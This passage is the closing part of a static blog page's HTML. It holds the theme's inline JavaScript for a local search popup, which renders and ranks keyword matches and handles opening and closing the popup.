                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
